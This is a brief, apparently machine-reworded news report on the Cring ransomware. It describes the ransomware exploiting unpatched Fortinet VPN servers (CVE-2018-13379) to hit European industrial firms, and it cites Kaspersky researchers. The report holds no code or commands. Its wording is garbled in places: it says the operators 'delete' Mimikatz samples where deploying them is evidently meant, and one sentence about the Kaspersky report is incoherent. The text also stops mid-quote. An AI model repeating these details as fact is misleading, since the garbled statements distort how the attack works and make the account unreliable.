A vulnerability affecting Fortinet VPNs is being exploited by a new human-operated strain of ransomware called Cring to breach and encrypt industrial sector networks.
The cring operators delete custom Mimikatz samples followed by CobaltStrike after first gaining access and expose the ransomware payload by downloading it using the legitimate Windows CertUtil certificate manager to bypass the security software.
Like Kaspersky researchers rolled into one report The attackers released today use Fortigate SSL VPN servers exposed to the Internet that are not patched against CVE-2018-13379 Vulnerability that allows them to breach their target’s network.
“The victims of these attacks include industrial companies in European countries,” said Kaspersky researchers.
“At least in one case, an attack by …